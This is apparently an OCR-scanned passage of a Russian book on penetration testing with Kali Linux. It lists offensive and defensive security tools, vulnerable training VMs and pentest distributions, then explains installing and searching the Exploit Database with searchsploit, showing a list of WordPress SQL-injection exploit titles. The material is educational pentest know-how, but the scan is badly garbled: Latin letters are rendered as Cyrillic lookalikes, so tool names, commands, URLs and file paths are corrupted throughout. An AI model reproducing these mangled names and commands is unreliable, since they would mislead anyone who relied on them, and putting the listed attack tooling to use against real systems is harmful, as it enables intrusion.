сказать коротко, это 5(ЭІ_- инжектор и кролер. Зсгаѵѵіг обойдёт весь веб¬ 
сайт в это же время анализируя параметры каждой веб-страницы на 
уязвимость ЗОІ Іщесііоп. 

Зргіпйепѵѵегк 

5ргіп§епѵѵегк — это бесплатный сканер безопасности кроссайтового 
скриптинга (Х55), написанный на РуіЬоп. 

Зрітар 

зцітар — это инструмент с открытым исходным кодом для тестирования 
на проникновение, который автоматизирует процесс выявления и 
эксплуатирования бреши 5Щ.-инъекций, при этом она позволяет 
получить все данные с сервера базы данных. 

Зцізиз 

5ЦІ51І5 — инструмент с открытым исходным кодом для МуЗЩ-инъекций 
и захвата, написан на РегІ. 

ТНС55І_СІіеск 

Инструмент ѴѴіпсІоѵѵз, который проверяет удалённый 55І стек на 
поддерживаемые шифры и версию. 

хл/За^ 

ѵѵЗаі" — это фреймворк атаки и аудита веб-приложений. Цель проекта — 
создать фреймворк для помощи в обеспечении безопасности ваших веб¬ 
приложений, путём поиска и эксплуатирования уязвимостей веб- 
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приложений. 

\А/а ріТі 

\А/аріТі позволяет вам проводить аудит безопасности веб-приложений. 

Он выполняет сканирование "чёрный ящик" (без доступа к исходному 
коду), т.е. он не изучает исходный код приложения, а работает с уже 
развернутыми сайтами, он ищет в них скрипты и формы, в которые 
можно было бы повставлять данные. 

\Л/еЫгі 22 ег 

ѴѴеЫТіггег — это инструмент, который может быть полезен как тестерам 
на проникновение, так и веб-мастерам. Как характеризует сам автор 
своё детище "это сканер веб уязвимостей бедного человека". 

\А/еЬСоа1; 

\Л/еЬСоа{ содержит намеренно небезопасные веб-приложения ]2ЕЕ, 
поддерживаемые ОѴѴА5Р, они предназначены быть уроками по 
безопасности веб-приложений. 

ѴѴеЬзесигіІѴ 

ѴѴеЬзесигМ'у 5иі1;е — это решение по безопасности веб-приложений, 
предназначенных для запуска исключительно из вашего веб-браузера. 

\Л/еЬ5Іаѵег 

\А/еЬ51ауег — это инструмент предназначенный для брут-форсинга веб¬ 
приложений, он может использоваться для нахождения источников, на 
которые не ведут ссылки (каталоги, сервлеты, скрипты и т.д.), 
брутфорсятся СЕТ и Р05Т параметры, брутфорсяться параметры форм 
(пользователь/пароль), фаззлинг и т.д. Этот инструмент имеет генератор 
запросов и прост и эффективен для анализа. 

ѴѴИаТѴѴеЬ 

ѴѴЬаТѴѴеЬ идентифицирует веб-сайты. Его цель — ответить на вопрос, 

"Что это за веб-сайта?". ѴѴЬаТѴѴеЬ распознаёт веб-технологии, включая 
системы управления содержимым (СМ5), платформы для блоггинга, 
статистику/анализ пакетов, ]аѵа5сгір1; библиотеки, веб-сервера и 
встроенные устройства. 

ѴѴікіо 

\А/і кТо — это N і кТо для ѴѴіпсІоѵѵз - но с парочкой модных функций, 
включая проверку кода на ошибки логики Риггу, фоновый майнер, поиск 
каталогов с использованием Соо§1е и мониторинг 
запросов/ответов НТТР в реальном времени. 

ѴѴЗОійеег 

Ѵ\/50і§§ег — это бесплатный с открытым исходным кодом инструмент, 
созданный в МсАІ'ее РоипсІБіопе для автоматической проверки веб¬ 
служб по принципу "чёрного ящика" (без доступа к исходному коду) — 
фактически, для тестирования на проникновение. \А/50і§§ег — это более 
чем инструмент, это фреймворк для тестирования веб-служб. 
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Х55РІОІ1 

Х55рІоі1; — это мультиплатформенный сканер и эксплуататор 
межсайтового скриптинга, он написан на РуІІіоп. Он был создан для 
помощи в поиске и использовании Х55 уязвимостей в миссиях 

тестирования на проникновение. 

Рігеіюгсе 

Рігеіюгсе это расширение для Рігеіюх, созданное для выполнения брут- 
форс атак на ОЕТ и Р05Т формы. Ріге^огсе может использовать словари 
или генерировать пароли, основываясь на разных наборах символов. 

ІМеІзрагкег 

ІМеІзрагкег — это сканер безопасности веб-приложений с поддержкой 
как выявления так и эксплуатации уязвимостей. Его цель — работать без 
ложных срабатываний, сообщать только о реальных уязвимостях после 

успешного их эксплуатирования или после проверки их другими 

способами. 

Наѵіі 

РІаѵіі — это автоматизированный инструмент по 5Щ-инжектам, которые 
помогает тестерам на проникновение находить и эксплуатировать 5ЦІ,- 
инъекции в веб-странице. 


Уязвимости в 

базах данных 


Вегкеіеу ЭВ 

Огасіе Вегкеіеу ЭВ — это семья открытых, встраиваемых баз 
данных, которые позволяют разработчикам инкорпорировать в их 
приложения быстрые, масштабируемые, транзакционные базы 
данных с промышленным уровнем надёжности и доступности. 

ОаІаЬазе Ьгоѵѵзег 

ОаІаЬазе Ьгоѵѵзег — это универсальный редактор таблиц. Это 
простой в использовании инструмент, который позволяет 
пользователям подключаться к любой базе данных и бродить по 
ней или изменять данные, запускать зці скрипты, экспортировать и 

печатать данные. 

ОЬ2іі1:іі5 

бЬ2и1:іІ5 — эта маленькая коллекция утилит сІЬ2. В данный момент 
она включает три различные утилиты: 6Ь2 сіі 5СО, сИэ21аке5Гѵ и 
бЬ2§е1:ргоЯ1е. 

Огасіе Аисііііпй 

Тооіз 

Огасіе АисІі1:іп§ Тооіз — это набор инструментов, которые могут 
быть использованы для аудита безопасности внутри сервера базы 
данных Огасіе. 

Озсаппег 

Озсаппег — это оценочный фреймворк Огасіе, разработанный на 
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.Іаѵа. Он имеет основанную на плагинах архитектуру и поставляется 
с парой плагинов. 

5Щ. АисІШпй Тооіз 

5ЩАТ — это набор инструментов, которые могут быть полезны 
при пентестинге М5 5СН. сервера. Эти инструменты всё ещё в 
разработке, но уже достаточно стабильны. Эти инструменты 
выполняют атаки по словарю, загружают файлы, читают регистр и 

дампят 5АМ. 

ТНС-ОКАСІ.Е 

ТИС представляет крипто документ по анализу механизма 
аутентификации, используемом в базах данных Огасіе. ТИС 
дальнейшие релизы практических инструментов для захвата и 
взлома паролей от баз данных Огасіе за секунды. 

іЬс- 

огакеісгаскегііій 

ОгакеІСгаскегІ это взломщик хешей паролей от баз данных Огасіе 
11§, используя слабости в стратегии хранения паролей Огасіе. С 
Огасіе 11§ были представлены чувствительные к регистру хеши 

5НА1. 

ОВРѵѵАисІіІ: 

ОВРѵѵАисІіІ; — это .Іаѵа инструмент, который позволяет выполнять 
различный онлайн аудиты качества паролей для нескольких 
движков баз данных. Дизайн приложения позволяет легко 
добавлять дополнительные драйвера баз данных простым 
копированием новых ЮВС драйверов в директорию ісІЬс. 

МѴ5<ЭІ.АисІіІ 

Скрипт наРуіЬоп для базового аудита распространённых ошибок 
конфигурации в МуЗЦІ.. 

заііпіп іа 

зцПтща эксплуатирует веб-приложения, которые используют 
МісгозоД 5Щ. 5егѵег в качестве фоновой базы данных. Она 
фокусируется на получении работающего шелла на удалённом 
хосте, зціпіпіа не ставит на первое место поиск ЗЩ-иъекций, но 
автоматизирует процесс эксплуатации, как только она была 
найдена. 

СгеепЗоІ 

ОгеепЗЩ это файервол с открытым исходным кодом для баз 
данных, используемый для защиты от атак 5Щ-инъекции. 

ОгеепЗЩ работает как прокси и имеет встроенную поддержку для 
МуЗЦІ. и Ро$1;§ге5Щ. 

Сканеры 

уязвимостей 
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Меіазріоіі; 

Ргатеѵѵогк 

ТЬе МеТа5р1оИ; Ргатеѵѵогк — это продвинутая платформа с открытым 
исходным кодом для разработки, тестирования и эксплуатирования 

кода. 

ОрепѴАБ 

ОрепѴАБ — это фреймворк нескольких служб и инструментов, 

предлагающих всестороннее и мощное решение по управлению 

сканированием уязвимостей. 

N05505 

Ые55сі5 выявляет, сканирует и профилирует многочисленные 
устройства и источники для увеличения безопасности и соответствия 

в вашей сети. 

РогкЬіпсІ 

РогкЬіпсІ — это многопоточный сканер серверов имён, который 
может рекурсивно делать запросы на сервера имён поддоменов для 
строк версий (например, сервера имён зиЬ.Нозі.сІот, затем сервера 
имён Ьозі.сіот). 

Сапѵа5 

Іттипііу САЫѴАБ от Іттипііу делает доступными сотни эксплойтов, 
систему автоматического эксплуатирования и всесторонний, 
надёжный фреймворк по разработке эксплойтов для 
тестерировщиков на проникновение и профессионалов по 
безопасности по всему миру. 

5осіаІ- 

ЕпкіпеегТооІкіІ; 

(5ЕЦ 

5осіаІ-Еп§іпеег Тооікіі: (5ЕТ) создан для продвинутых атак на 

"человеческий фактор". 5ЕТ был выпущен вместе с 

запуском Ні;1;р://ѵѵѵѵѵѵ.5осіаІ-еп§іпеег.ог§ и быстро стал стандартным 

инструментом в арсенале пентестеров. 

Асипеііх 

Асипеііх ѵѵеЬ ѵиІпегаЬіІіТу зсаппег — это инструмент созданный для 
выявления дыр в безопасности в ваших веб-приложениях, которые 
при атаке, вероятно, станут слабым звеном, через которые будет 
получен незаконный доступ к вашей системе и данным. Он ищет 
множество уязвимостей, включая БЩ-инъекции, межсайтовый 
скриптинг и слабые пароли. 

РІР5 

ШР5 — это инструмент, написанный на РНР, для поиска уязвимостей 
в РНР приложениях используя статический анализ кода. 

РарісІ7 ЫеХрозе 

КарісІ7 ИеХрозе — это сканер уязвимостей, цель которого 
поддержать полный жизненный цикл управления уязвимостями, 
включая обнаружение, выявление, верификацию, классификацию 
риска, анализ влияния, описание и смягчение. Он интегрирован с 
РарісІ7 от Меіазріоіі; для исследования уязвимостей. 
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ѴиІпОеІесІог 

ѴиІпОеІесІог — это проект нацеленный на сканирование веб-сайта и 
выявление различных связанных с веб уязвимостью безопасности в 
веб-сайте. В настоящее время ѴиІпОеІесІог может выявить такие 
уязвимости как межсайтовый скриптинг (Х55) и 5Щ_-инъекции (5СШ) в 
веб-скриптах, но не имеет простого в работе интерфейса. 

йатп 5таІІ 5СШ 

Зсаппег 

0555 поддерживает ЫіпсІ/еггог 5СШ тесты, сканирование в одну 
глубину и продвинутое сравнение различных атрибутов, чтобы 
отличить слепые ответы (заголовки, статусные коды НТТР, 
отфильтрованного только по длине текста и нечёткое сравнение 
самого контента). Если вы удовлетворены результатами 

сканирования коммерческих инструментов, то я уверен, что вы 

будете ещё более удовлетворены этим инструментом. 

САТ. N ЕТ 

САТ.ІМЕТ — это анализатор исполнимого кода, который помогает 
выявить распространённые варианты определённых преобладающих 
уязвимостей, которые могут привести к атакам общего вектора, 
таким как межсайтовый скриптинг (Х55), 5ЦІ_-инжекты и ХРаІб 

инжекты. 

Реасб Риггег 

Реасб — это ЗтагіРиггег, который может и составлять запросы как 
генерацией, так и перестановкой. РеасН требует создание 
файлов РеасНРИ, которые определяют структуру, тип информации и 

отношения для данных. 

СРІ І_апСиагсІ 

СРІ ІапСиагсІ — это сканер безопасности сети и уязвимостей, 
созданный для помощи в управлениями патчами, сетью и аудита 
программного обеспечения и оценки уязвимостей. Цена зависит от 
количества ІР адресов для сканирования. Есть бесплатная пробная 
версия для сканирования до 5 ІР адресов. 

МВ5А 

Місгозоіі: Вазеііпе Зесигііу Апаіугег (МВ5А) — это простой в 
использовании инструмент, предназначенный для ІТ 
профессионалов, который помогает малым и средним бизнесам 
определять их состояние безопасности в соответствии с 
рекомендациями по безопасности Місгозоіі: и предлагает 

конкретные рекомендации по итогу проверки. 


Уязвимые 

приложения 


Оатп ѴиІпегаЫе 

Оатп ѴиІпегаЫе ѴѴеЬ Арр (ОѴѴѴА) это веб-приложение на 
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ѴѴеЬ АррІісаТіоп 

ЮѴ\Л/А) 

РНР/Му5Щ, которое чертовски уязвимое. Главная его цель — это 
помощь профессионалам по безопасности для тестирования их 
способностей и инструментов не нарушая закон, помочь веб¬ 
разработчиком лучше понимать процессы безопасности веб¬ 
приложений и помочь учителям/студентам научить/изучить 
безопасности веб-приложений в обстановке класса. 

Оатп ѴиІпегаЫе 

Ыпих 

Оатп ѴиІпегаЫе Ыпих (ОѴІ.) — этот дистрибутив Ыпих всем хорош, 
не так ли? Его разработчики потратили часы, начиняя его 
сломанным, плохо сконфигурированным, устаревшим и уязвимым 
программным обеспечением, что делает его уязвимым для атак. 

ОѴІ. не создан для запуска на вашем компьютере — это инструмент 
для студентов изучающих безопасность. 

МеІазрІоіІаЫе 

МеІазрІоіІаЫе — это традиционная уязвимая виртуальная машина 
Ыпих. Эта ѴМ может быть использована для проведения тренингов 
по безопасности, тестировании инструментов по безопасности и 

практике в тестировании популярных техник по проникновению. 

Кіорігіх 

Этот образ КіорТгіх ѴМ является лёгкой задачей. Цель игры — 
получить доступ рута любыми возможными способами, кроме 
реального взлома сервера ѴМ или игрока). Цель этой игры — 
научить основным инструментам и техникам в оценке уязвимостей 

и их эксплуатации. 

НопеѵОгіѵе 

НопеуОгіѵе — это виртуальное устройство (ОѴА) с установленной 
ХиЬипІи Эезкіор 12.04 32-битной версией. Оно содержит 
различные пакеты такого программного обеспечения как 
"приманки" — Гіопеуроі. Это Кірро 55Н ГюпеуроЦ Оіопаеа таіѵѵаге 
Гіопеуроі, Нопеуб Іо\л/-іп1;егас1;іоп ГюпеуроЦ Оіазіорі ѵѵеЬ Гіопеуроі 
вместе с ѴѴогфоІ:, Тби§ Гіопеусііепі и другие. 

Васізіоге 

Васізіоге.пеі; предназначен для того, чтобы вы понимали, как 
хакеры охотятся на уязвимости веб-приложений и чтобы вы 

понимали как уменьшить вашу подверженность. 

ОѴѴА5Р Іпзесиге 

ѴѴеЬ Арр Ргоіесі; 

Іп$есиге\Л/еЬАрр — это веб-приложение, которое включает 
приложения с распространёнными уязвимостями. Это цель для 

автоматического и ручного тестирования на проникновения, 

анализа исходного кода, оценки уязвимостей и моделирования 

угроз. 

ѴиІпАрр 

ѴиІпАрр — это АЗР.пеІ; приложение под лицензией В50, 
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реализующее самые распространённые приложения, с которыми 
мы сталкиваемся в обстоятельствах проведения своих тестов на 

проникновение. 

ОѴѴА5Р Ѵіспит 

Ѵіспит это проект ОѴѴА5Р, состоящий из уязвимых веб¬ 
приложений, основанных на играх, обычно использующих для 
убийства времени. Эти приложения демонстрируют популярные 
проблемы веб-безопасности, такие как межсайтовый скриптинг, 
зці инжекты и проблемы с манипуляцией сессиями. 

ОѴѴА5Р Вгокеп 

ѴѴеЬ Арріісаііопз 

Ргоіесі 

ТИе Вгокеп ѴѴеЬ АррІісаТіопз (ВѴѴА) Ргоіесі; производит виртуальную 

машину с запущенными различными приложениями с известными 

уязвимостями. 

І_АМР5есигі1:ѵ 

Тренинг І-АМРЗесигііу — это серия образов виртуальных машин 
вместе с дополнительной документацией, предназначенной для 
обучения безопасность Ыпих, АрасНе, РНР, Му50.І_. 

ѴігіиаІ Наскіпй ЬаЬ 

Зеркало намеренно небезопасных приложений и старого 
программного обеспечения с известными уязвимостями. 
Используется концептов / тренингам по безопасности / в целях 
обучения. Доступен как в образах виртуальных машин или как Ііѵе 
ізо или в по отдельности. 

ѴѴАѴ5ЕР 

ТЬе ѴѴеЬ Арріісаііоп ѴиІпегаЬіІіТу Зсаппег Еѵаіиаііоп Ргоіесі — это 
уязвимое веб-приложение, разработанное чтобы помочь оценить 
особенности, качество и точность сканеров уязвимостей веб¬ 
приложений. Эта оценочная платформа содержит набор 
уникальных уязвимых веб-страниц, которые могут использоваться 
для тестирования различных свойств сканеров веб-приложений. 

МоіН 

МоіЬ — это образ ѴМѵѵаге с настроенными уявзимыми веб¬ 
приложениями и скриптами, которые вы можете использовать для 

тестирования сканеров безопасности веб-приложений, тестировать 
инструменты статичного анализа кода (5СА), давая вводный курс в 
безопасность веб-приложений. 

ЗесигіВепсН 

ЗіапіогсІ ЗесигіВепсЬ — это набор реальных рабочих программ для 

использования в качестве испытательного полигона для 

статических и динамических инструментов безопасности. 

Выпуск ,91а фокусируется на веб-приложениях написанных на ]аѵа. 

ЫЕТіпѴМ 

ЫЕТіпѴМ это единичный образ для виртуальной машины ѴМѵѵаге 
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или ѴігІиаІВох, который содержит готовую для запуска серию 
виртуальных машин ІІзег-тосІе Ыпих (ІІМІ.) (Ыпих 

пользовательского режима), которые, когда запущены, 
соответствуют целой компьютерной сети внутри виртуальной 

машины ѴМѵѵаге или ѴігІиаІВох. 

0о|о 

Ѵ\/еЬ Зесигііу Ооіо — это настроенная автономная обучающая среда 
по безопасности веб-приложений. Для загрузки доступны версии 
под ѴігІиаІВох и ѴМѵѵаге. Эоіо — это проект с открытым исходным 
кодом, цель которого — быть обучающей средой, которую можно 
использовать как платформу для тестирования на проникновение, 
поскольку в неё уже включены уязвимые службы и приложения. 

Ыѵе СО 


ВаскТгаск 

ВаскТгаск — это основанный на Ыпих арсенал для тестирования на 
проникновение, которые помогает профессионалам в безопасности в 
их оценке, находясь в их чисто родной среде, выделенной для хакинга. 

В настоящее время дистрибутив переименован в Каіі Ыпих. 

Каіі Ыпих 

Каіі Ыпих (ранее известный как ВаскТгаск) — это основанный на ЭеЫап 
дистрибутив с коллекцией инструментов по безопасности и 
криминалистике. Его особенностями являются своевременные 
обновления безопасности, поддержка архитектуры АВМ, выбор из 
четырёх популярных окружений рабочего стола и лёгкое обновление до 
новых версий дистрибутивов. 

ВаскВох 

ВаскВох — это дистрибутив Ыпих, основанный на ІІЬипІи. Он был создан 
для осуществления тестов на проникновение и оценки безопасности. 
Создан быть быстрым, простым в использовании и обеспечивать 
минимальное, но полное окружение рабочего стола; благодаря его 
собственным репозиториям программного обеспечения, всегда 
остаётся обновлённым до последних стабильных версий большинства 
наиболее используемых и хорошо известных инструментов для 

этического хакинга. 

Затигаі 

Тбе Затигаі \А/еЬ Тез1;іп§ Ргатеѵѵогк — это Ііѵе окружение Ііпих, которое 
было настроено для функционирования в качестве окружения для 
пентестинга. СО содержит лучшие опен сорсные и бесплатные 
инструменты, которые фокусируются на тестировании и атаке веб¬ 
сайтов. 
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Каіапа 

Каіапа — это портативный мультизагрузочный набор по безопасности, 
который собрал вмести много современных дистрибутивов по 
безопасности и портативных приложений для запуска на одной флешке. 
Он включает дистрибутивы, которые сфокусированы на пентестинге, 

аудите, криминалистическом исследовании, восстановлении системы, 

анализе сети и удалении зловредных программ. Каіапа также 
поставляется с более чем 100 портативными приложениями \Л/іпсіоѵѵз; 
такими как ѴѴігезЬагк, Меіазріоіі:, ЫМАР, Саіп & АЬеІ и многими 

другими. 

ЫаскЬипІи 

Дистрибутив для тестирования на проникновение, основан на ІІЬипІи 
10.10, который специально был создан для тренировки студентов и 
практикантов по информационной безопасности. 

Викітар 

Ви^ігац — это дистрибутив, основанный на ядре 2.6.38, имеет широкий 
спектр инструментов для проникновения и криминалистики. Ви§1;гар 
можно установить с Ыѵе 0\Ю или 115В диска, этот дистрибутив собран из 
последних пакетов, настроен, ядро обновлено и пропатчено для лучшей 

производительности и распознавания различного железа, включены 

патчи для беспроводных инжектов, которые другие дистрибутивы не 

распознают. 

Ыеіѵѵогк 

Зесигііѵ 

ТооІкіТ (N51) 

Загрузочный 150 Ііѵе С0/0\Ю (N51 Ыѵе) основан на Ресіога. Этот набор 
инструментов был создан для обеспечения простого доступа к самым 
качественным приложениями по безопасности сети с открытым 
исходным кодом и должен запускаться на большинстве х86/х86_64 
платформ. 

Репіоо 

Репіоо — это ЫѵеСО дистрибутив для тестирования на проникновение 
на основе ОепІоо.Его особенности — множество инструментов для 
аудита и тестирования сетей, от сканирования и выявления до 
эксплуатирования уязвимостей. 

ВІаскАгсН 

ВІаскАгсН дистрибутив основанный на АгсН.Там более 600 инструментов 
в репозитории пакетов ВІаскАгсН. ТНе ВІаскАгсН Ііѵе 150 поставляется с 
множеством менеджеров окон, включая сіѵѵт, Аѵѵезоте, РІихЬох, 
ОрепЬох, ѵѵтіі, ІЗ и 5рес1пл/т. Репозиторий пакетов ВІаскАгсН совместим 
с существующими установками АгсН. 
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Глава 17. База данных эксплойтов от ОНепзіѵе Зесигііу 
(создателей Каіі Ыпих) 

СИ: репозиторий Базы данных эксплойтов и зеагсНзрІоіі: сходства и 
различия 

База данных эксплойтов (ТИе Ехріоіі РаІаЬазе) — это архив публичных эксплойтов и 
соответствующего уязвимого программного обеспечения, она создаётся и 
поддерживается для тестировщиков на проникновение и исследователей уязвимостей. 
Её цель — это создание и обслуживание самой полной коллекции эксплойтов, 
собранных от прямых подписок, списков почтовых рассылок и других публичных 
источников. Эксплойты представленных в свободном доступе в базе данных с удобной 
навигацией. База данных эксплойтов — это в большей степени хранилище эксплойтов и 
рабочих моделей, чем советы, что делает её ценным ресурсом для тех, кому нужны 
рабочие данные прямо сейчас. Говоря простым языком, большая часть содержащегося 
в базе — это рабочие эксплойты. 

Репозиторий обновляется ежедневно — по мере того, как становятся известными 
новые эксплойты. Дополнительно обратите внимание на Базу данных эксплойтов 
бинарных файлов (Ехріоіі: РаіаЬазе Віпагу Ехріоііз) . В этом месте собраны 
скомпилированные и готовые файлы тех эксплойтов, которые нужно компилировать 
или которые нужно создавать особым образом. В Каіі Ыпих эти бинарники отсутствуют. 
Если вы нашли эксплойт, который нужно компилировать, то смотрите имя файла, 
например это 31583 .Тхі;. Отбрасываем расширение и ищем по названию 31583 в базе 
данных бинарников . Находим там файл 31583.босх — это не бинарник, это уже 
рабочий концепт. Кроме собственно бинарников, там присутствуют особым образом 
сделанные картинки, базы данных, я видел аудио файл, ну и, конечно, много 
исполнимых файлов. Думаю, причиной, по которым эти файлы не попали в Каіі 
является то, что многие из этих файлов определяются антивирусными программами 
как вирусы. 

Об Ехріоіі; РаІаЬазе Віпагу Ехріоііз как-то не очень много говорят — я узнал о ней 
совсем недавно, чисто случайно. Её также можно клонировать себе в систему и искать 
ещё и по ней. 

К репозиторию также прилагается утилипа зеагсНзрІоіі, которая позволяет производить 
поиск по базе по одному или по нескольким словам. 

Итого, у нас имеется 3 очень похожих ресурса: 

• СИ: репозиторий Базы данных эксплойтов 

• Программа зеагсбзріоіі; в Каіі Ыпих 

• Веб-сайт НіІрзѴ/ѵѵѵѵѵѵ.ехрІоН-бЬ.сот/ 

Программа зеагсЬзрІоіІ; в Каіі Ыпих отличается от СИ: репозитория тем, что: 

• её база обновляется не каждый день 

• отсутствуют некоторые ключи, которые есть в утилите из СИ репозитория (-и, -I, - 
ѵѵ, — соіоиг, — іб) 

• разное количество файлов в базах 
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Веб-сайт ѵѵѵѵѵѵ.ехрІоіі-сІЬ.сот — это что-то вроде графического интерфейса для всего 
этого богатства. Веб-сайт мне нравится тем, что показывает последние поступления. 
Если нужен какой-то свежак, то за ним нужно идти именно сюда. 


Установка зеагсИзрІоіІ: 

На Каіі Базу данных эксплойтов смысла устанавливать нет, там практически то же самое 
в зеагсИзрІоИ;. 

Кстати, если вы собираетесь пользоваться зеагсЬзрІоіІ: (хоть в Каіі, хоть в другом 
дистрибутиве), то посмотрите статью « МеТазрІоіІ: ЕхрІоіТаТіоп Ргатеѵѵогк и зеагсИзрІоіІ: 
— как искать и как использовать эксплойты ». Там есть полезные советы, которые не 
попали в эту заметку. 

Итак, я буду устанавливать зеагсИзрІоіІ; (Базу данных эксплойтов) на Ыпих МіпТ 
(аналогично для ІІЬипІи и ОеЬіап). 


Для сторонних программ я создал в пользовательском каталоге директорию орі: 


1 


тЫіг орТ 


Переходим туда: 


1 


ССІ орі 


Если у вас ещё нет §ІІ, то установите его: 


1 


зисіо арТ-§е1: іпзТаІІ §І1: 


Клонируем репозиторий: 


1 


§І1: сіопе Кир5://§ііЬиЬ.сот/о1Теп5іѵе-5есигі1:у/ехрІоі1:-сІа1:аЬа$е.§і1: 


Поиск по Базе данных эксплойтов 


Запускать зеагсбзріоіі: из любого места так: 


1 


~/ор1:/ехрІоі1:-сІа1:аЬа5е/5еагсІі5рІоі1: 


Пример поиска: 


1 


~/орТ/ехрІоі1:-сІа1:аЬа5е/5еагсНзрІоіІ: ѵѵогсіргезз зрі 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


120 





















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Т.е. я ищу по ключевым словам ѵѵогсіргезз и зді: 


Терминал 


ІпсІіаМІС РАОб Мападег Ріидіп 1.0 • Вііпсі Іпіесііоп 
РгоРІауег Ріидіп 4.7.9.1 - Іпіесііоп 
РНР З.Ѳ - Миіііріе Іпіесііоп ѴиІпегаЬіІіііеБ 

М05ратРТІ Ріидіп - Вііпсі Іпіесііоп 
Ріидіп Кеаііу - Вііпсі Іпіесііоп 
Рогтсгаіі Ріидіп - Іпіесііоп ѴиІпегаЬіІііу 
Ріидіп БЬіііТЬіб №мБІеііег - Іпіесііоп ѴиІпегаЬіІі 
КесіреБ Віод Ріидіп 'і<Г Рагатеіег - Іпіесііоп Ѵиіп 
ир-реоріе Ріидіп 2.0 - 'ѵср-реорІе-рорир.рЬр' Іпіесі 
ИР РЬоіо АІЬит Ріидіп - 'рЬоіо' Рагатеіег Іпіесііоп 
ІІрІоасІ Рііе Ріидіп 'ѵср-ирІоасІІіІе.рЬр' - Іпіесііоп 
РагіісірапіБ ОаіаЬаБе 1.5.4.8 - Іпіесііоп 
РисімеЬ СарСС Ріидіп 1.0 Іог - 'рІидіпБ.рЬр' Іп]есі 

Ріидіп Саііегу 0Ь]есі5 0.4 - Іпіесііоп 
Ниде-ІТ Ітаде Саііегу і.ѳ.і - АиіЬепіісаіесІ Іпіесіі 
1_іке йІБІіке Соипіег 1.2.3 Ріидіп - Іпіесііоп Ѵиіпе 
АН Іп Опе ИР Зесигііу Ріидіп 3.8.2 - Іпіесііоп 
СР Миііі Ѵіем Еѵепі Саіепсіаг 1.Ѳ1 - Іпіесііоп 
АпоіЬег СІаББІііесІБ Ріидіп - Іпіесііоп 

5Р Сііепі Ооситепі Мападег Ріидіп 2.4.1 - Іпіесііоп 
ырЭаіаТаЫеБ Ріидіп 1.5.3 - Іпіесііоп ѴиІпегаЬіІііу 
Ооодіе Ооситепі ЕтЬесІсІег 2.5.14 - Іпіесііоп 
Сагібб І_ііе Есоттегсе 1.5.1.17 - Вііпсі Іпіесііоп 

Ріидіп БутроБІит 14.10 - Іпіесііоп 
ИР-5іаг5КаіеВох Ріидіп 1.1 - •з• Рагатеіег Іпіесііо 
СО 5іаг Каііпд Ріидіп 'ѵоіѳб' Рагатеіег - Іпіесііоп 
Ргеііу 1-іпк іііе Ріидіп 1.4.56 - Миіііріе Іпіесііоп 
Ѵісіео Саііегу 2.7.0 - Іпіесііоп ѴиІпегаЬіІііу 
Зигѵеу апсі Роіі Ріидіп 1.1 - Вііпсі Іпіесііоп 
НеЬсІогасІо Брісіег Еѵепі Саіепсіаг 1.4.9 - Іпіесііоп 
АисііопБ Ріидіп 1.8.8 - ‘ыра ісГ Рагатеіег Іпіесііо 
ИР Ваппегіге 2.8.7 - ’аіахБогіег.рЬр' Іпіесііоп Ѵи 
Саісиіаіесі РіеІсІБ Рогт Ріидіп <= 1.Ѳ.1Ѳ - Ветоіе Іп 

ТЬете РЬоіосгаіі 4.х.х - Іпіесііоп & Х55 
ср-тиііі-ѵіем-саіепсіаг <= 1.1.4 - Іпіесііоп ѵиіпега 
5Е0 Ьу Ѵоэбі 1.7.3.3 - Вііпсі Іпіесііоп 
5Р Ргоіесі & Ооситепі Мападег 2.5.3 - Вііпсі Іпіесіі 
ВиБІпеБ б Іпіеііідепсе Ріидіп - іпіесііоп 
Зітріе Асіб Мападег Ріидіп - Миіііріе Іпіесііоп 
АН Іп Опе ИР Бесигііу & Рігемаіі 3.9.0 Іпіесііоп V 
Тгаіііс Апаіугег Ріидіп 3.4.2 - Вііпсі Іпіесііоп 
Оиріісаіог <= Ѳ.5.14 - Іпіесііоп & С5КР 
Ѵісіео Саііегу 2.8 - Іпіесііоп 

Аіах 5іоге Ьосаіог 1.2 - Іпіесііоп ѴиІпегаЬіІііу 
МЕХ-Рогшб < 3.0 - Іпіесііоп ѴиІпегаЬіІііу 
Типе ЬіЬгагу Ріидіп 1.5.4 - Іпіесііоп ѴиІпегаЬіІііу 
Соттипііу ЕѵепіБ Ріидіп 1.3.5 - Іпіесііоп ѴиІпегаЬі 
ІЛіітаіе Ргосіисі Саіаіодие Ріидіп - ипаиіЬепіісаіес! 

ІІІіітаіе Ргодисі Саіаіодие Ріидіп - ІІпаиіЬепіісаіес) 

РгеБЬтаіІ ІІпаиіЬепіісаіес! Іпіесііоп 
РгеБЬтаіІ Ріидіп <= 1.5.8 - (БЬогісосІе.рЬр) Іпіесіі 
ТадСаіог 'іадісГ Рагатеіег Іпіесііоп ѴиІпегаЬіІііу 
Реесі Ріидіп 2Ѳ15.Ѳ426 - Іпіесііоп 

ИР бутроБІит Ріидіп 15.1 Іпіесііоп ѴиІпегаЬіІііу 
СідРгеББ Ріидіп 2.3.8 - Іпіесііоп 
ЬеадиеМападег 3.9.11 Ріидіп - і 
Ргеііу 1_іпк Ьііе Ріидіп 1.5.2 Іпіесііоп апсі Сгобб 5 

БЬагеЬаг Ріидіп 1.2.1 Іпіесііоп апсі Сгобб 5ііе 5сгі 
Еа5у2Мар Ріидіп 1.24 - Іпіесііоп 


./рЬр/меЬарр5/24868.гЬ 
./рЬр/ыеЬаррБ/25605.іхі 
./рЬр/меЬарр5/266Ѳ8.іхі 
./рЬр/ыеЬаррБ/28485.іхі 
,/рЬр/меЬаррБ/29Ѳ21.Іхі 
./рЬр/меЬарр5/ЗѲѲѲ2.іхі 
./рЬр/ыеЬарр5/31Ѳ96.іхі 
,/рЬр/меЬарр5/31228.Іхі 
./рЬр/меЬаррБ/31230.іхі 
./рЬр/ыеЬарр5/3177б.іхі 
./рЬр/меЬарр5/3183б.іхі 
,/рЬр/меЬаррБ/ЗЗбІЗ.іхі 
./рЬр/меЬарр5/33813.НітІ 
./рЬр/ыеЬаррБ/34105.іхі 
./рЬр/меЬаррБ/34524.іхі 
./рЬр/ыеЬаррБ/34553.іхі 
./рЬр/меЬаррБ/34781.іхі 
./рЬр/меЬарр5/35Ѳ73.іхі 
./рЬр/меЬарр5/352Ѳ4.іхі 
./рЬр/меЬаррБ/35313.іхі 
./рЬр/ыеЬаррБ/35340.іхі 
./рЬр/ыеЬаррБ/35371.іхі 
./рЬр/меЬаррБ/35459.іхі 
./рЬр/меЬаррБ/35505.іхі 
./рЬр/иеЬаррБ/35634.іхі 
./рЬр/меЬаррБ/35835.іхі 
